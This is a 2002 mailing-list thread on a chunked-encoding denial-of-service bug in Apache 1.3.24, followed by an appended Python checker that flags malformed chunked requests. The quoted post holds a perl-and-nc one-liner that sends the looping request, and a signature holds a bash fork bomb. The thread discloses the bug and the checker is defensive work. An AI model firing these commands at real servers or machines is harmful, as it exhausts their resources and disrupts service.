Dear Edwin Groothuis:

Apache/1.3.23 (Unix) (Red-Hat/Linux) in my box doesn't show this behaviour

kiven_chen

======= 2002-06-20 12:13:00 IN YOUR E-MAIL: =======
>On Thu, Jun 20, 2002 at 12:21:47AM +0200, Przemyslaw Frasunek wrote:
>> I was playing a bit with chunked encoding vulnerability and found the
>> following. When I send a request to Apache 1.3.24 using malformed
>> chunked encoding, httpd process goes into infinite loop and CPU load
>> grows to 100. Example:
>>
>> perl -e 'print "POST http://www/index.html HTTP/1.1\r\nAccept: */*\r\nHost: www\r\nContent-Type: application/x-www-form-urlencoded\r\nTransfer-Encoding: chunked\r\nContent-length: 5000\r\n\r\n" . "A"x5000 . "\r\n\r\n"' | nc localhost 80
>>
>> 62681 www 63 0 146M 5364K RUN 3:08 45.90 45.90 apache
>> 42121 www 63 0 139M 2524K RUN 1:15 44.97 44.97 apache
>>
>> Can anyone try it with 1.3.26?
>
>Apache 1.3.26 doesn't show this behaviour
>(yes, I've tried it with 1.3.20 first)
>
>Edwin
>--
>Edwin Groothuis | Personal website: http://www.MavEtJu.org
>edwinat_private | Interested in MUDs? Visit Fatal Dimensions:
>bash$ :(){ :|:&};: | http://www.FatalDimensions.org/
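
The request quoted above, run through a receive-side framing check, as an added example (not code from this thread or from Apache). It flags a request that carries both Transfer-Encoding: chunked and Content-Length and then walks the chunk framing; the function name, the finding labels and the MAX_CHUNK cap are assumptions made for this illustration.

```python
import re

MAX_CHUNK = 1 << 20  # assumed policy cap for one chunk, not a value from the thread
SIZE_LINE = re.compile(rb"([0-9A-Fa-f]+)[ \t]*(;.*)?")  # hex size, optional extension

def check_chunked_request(raw: bytes) -> list:
    """Return framing findings for one raw HTTP/1.1 request (empty list = clean)."""
    head, sep, body = raw.partition(b"\r\n\r\n")
    if not sep:
        return ["incomplete-headers"]
    headers = {}
    for line in head.split(b"\r\n")[1:]:           # skip the request line
        name, _, value = line.partition(b":")
        headers[name.strip().lower()] = value.strip().lower()
    if b"chunked" not in headers.get(b"transfer-encoding", b""):
        return []
    findings = []
    if b"content-length" in headers:                # two conflicting length signals
        findings.append("te-and-content-length")
    pos = 0
    while True:
        eol = body.find(b"\r\n", pos)
        if eol < 0:
            findings.append("truncated-body")
            break
        m = SIZE_LINE.fullmatch(body[pos:eol])
        if not m:
            findings.append("bad-chunk-size")
            break
        size = int(m.group(1), 16)
        if size > MAX_CHUNK:                        # checked before any data is read
            findings.append("chunk-too-large")
            break
        if size == 0:
            break                                   # last-chunk; trailers not examined
        data_end = eol + 2 + size
        if body[data_end:data_end + 2] != b"\r\n":
            findings.append("bad-chunk-terminator")
            break
        pos = data_end + 2
    return findings

# Constructed inputs: the first mirrors the request in the thread, the second is valid.
HEAD = (b"POST http://www/index.html HTTP/1.1\r\nAccept: */*\r\nHost: www\r\n"
        b"Content-Type: application/x-www-form-urlencoded\r\n"
        b"Transfer-Encoding: chunked\r\n")
THREAD_STYLE = HEAD + b"Content-length: 5000\r\n\r\n" + b"A" * 5000 + b"\r\n\r\n"
WELL_FORMED = HEAD + b"\r\n5\r\nhello\r\n0\r\n\r\n"
```

Because "A" is a valid hex digit, the 5000-byte run in the thread's request parses as a single chunk-size line with an enormous value, so the size cap is what rejects it rather than the hex-syntax check.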